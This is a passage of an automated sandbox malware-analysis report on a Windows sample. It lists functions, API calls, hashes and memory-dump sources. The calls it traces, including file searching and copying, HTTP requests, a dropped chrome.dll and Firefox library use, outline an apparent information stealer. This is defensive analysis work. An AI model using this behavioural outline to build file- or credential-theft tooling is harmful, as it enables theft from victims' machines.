                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00001770), ref: 00416DA4
                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,?,0079D738,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416DBA
                                                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00416DC2
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 941982115-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f3b511c524be299cd156f99fb22a7794b01e94f1481c90148a3a92a4c1d31000
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8f12dcb365d2fb80f233d5f720f30c8ba2b1eb9bf2b810d0bdce41a90926edfe
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3b511c524be299cd156f99fb22a7794b01e94f1481c90148a3a92a4c1d31000
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46F08230B48219EFEB00BBA0EC0ABFE7375AF04705F15061BB516A51D0DBB89681CA5B
                                                                                                                                                                                                                                                                                                                                  Function 00414E00 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414E3A
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A0CB0), ref: 00414E58
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C00
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,004208D3), ref: 00414C15
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C32
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00414C6E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,0079D4F8,?,000003E8), ref: 00414C9A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE0), ref: 00414CAC
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CC0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE4), ref: 00414CD2
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CE6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00414CFC
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: DeleteFileA.KERNEL32(?), ref: 00414D81
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C57
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                                                                                                  • String ID: hz
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2104210347-3633799393
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3a2c7de1c227a99b6b369bc9f677e35e16e1f1238a182381cd8bd8349fa3609d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e9161ec81bcd1d29be655bd6d91fa6844fd782dbdf96c1af6834d1d6ae200bb8
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a2c7de1c227a99b6b369bc9f677e35e16e1f1238a182381cd8bd8349fa3609d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F041B6B7E0410467C754F764FC52EEE333E9BC8304F40855EB54696191ED78AAC88B95
                                                                                                                                                                                                                                                                                                                                  Function 00415440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004062D0: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,007A20A8), ref: 00406353
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,007A1498,00000000,00000000,00400100,00000000), ref: 004063D5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415478
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                                                                                                                                                                                                                                                                                                                  • String ID: ERROR$ERROR
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3287882509-2579291623
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ec4e3e1820b860fcd3fb080cbf6b1ff945437ce47793e198e92cbe0f39f873f6
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 220a7b172e2a8d17d187597bbcd3bb12c7c2fc56be07e285a6b23909b802432f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec4e3e1820b860fcd3fb080cbf6b1ff945437ce47793e198e92cbe0f39f873f6
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E118630A01048ABCB14FF65EC52EED33399F50354F40456EF90A5B4A2EF38AB95C65E
                                                                                                                                                                                                                                                                                                                                  Function 004152A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004152DA
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A09F8), ref: 004152F8
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                                                                                                                                                                                                                                                                                                  • String ID: 9dA
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2699682494-3568425128
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 749b9b8237668bfb395f865c858ae7d7ba4570a417210e31536e2691fc7bf7fa
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7a1763d3762e4bc1164bf129b3bea8c613207f41675935a6caeb9cdf66552cef
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 749b9b8237668bfb395f865c858ae7d7ba4570a417210e31536e2691fc7bf7fa
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E01D6B6E0520867CB14FB71EC53EDE733D9B54305F00419EB64996091EE78ABC8CBA5
                                                                                                                                                                                                                                                                                                                                  Function 004108ED Relevance: 4.7, APIs: 3, Instructions: 223fileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0079D508), ref: 00410922
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0079D458), ref: 00410B79
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0079D588), ref: 00410A0C
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00410C35
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: DeleteFilelstrcpy
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 273707478-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 41cd63d51d5e3c55c2cffd15c02f5fbd906e47e0681574a4971aa1cf7b4e7a5a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 55ebfe5bea072269aba33a565d8c59cbe62f1375a0798b8cb4aa3666f491b8e5
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41cd63d51d5e3c55c2cffd15c02f5fbd906e47e0681574a4971aa1cf7b4e7a5a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EA916471B001089FCB18EF65DA95EED77B6EF94304F10816EE40A9F391DB349A49CB86
                                                                                                                                                                                                                                                                                                                                  Function 00419850 Relevance: 4.5, APIs: 3, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,004108DC,C:\ProgramData\chrome.dll), ref: 00419871
                                                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(000000FF,004108DC,?,004108DC,00000000,?,004108DC), ref: 004198A3
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: File$CreateWrite
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2263783195-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4590d48737ca33f694b7393ae38af987a89c0d5e22d4f591316c21f950809c55
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c00870ae4f46cd9ec0fbaadc8d13ab59566e93f84a6b66ec8604c729da6f8a20
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4590d48737ca33f694b7393ae38af987a89c0d5e22d4f591316c21f950809c55
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE11C830A08248BBDB10EFA0DC15BDE7B795F05314F044199F655A72C1DB346B45C7DA
                                                                                                                                                                                                                                                                                                                                  Function 00417A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                                                                                                                                                                                                                                                                                                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4203777966-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: bd395e3c10b2e9752f846d4f55ec5ddb2c88ed80ced139acaed9e3128f7bbde2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 80df14e24d55d9e77394b8c0389cbc6422d62e125eda11eaf6ba37d1415b345b
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd395e3c10b2e9752f846d4f55ec5ddb2c88ed80ced139acaed9e3128f7bbde2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D60181B1E08359ABC700CF98DD45BAFBBB8FB04751F10021BF505E2280E7B85A408BA2
                                                                                                                                                                                                                                                                                                                                  Function 6C5D3060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C5D3095
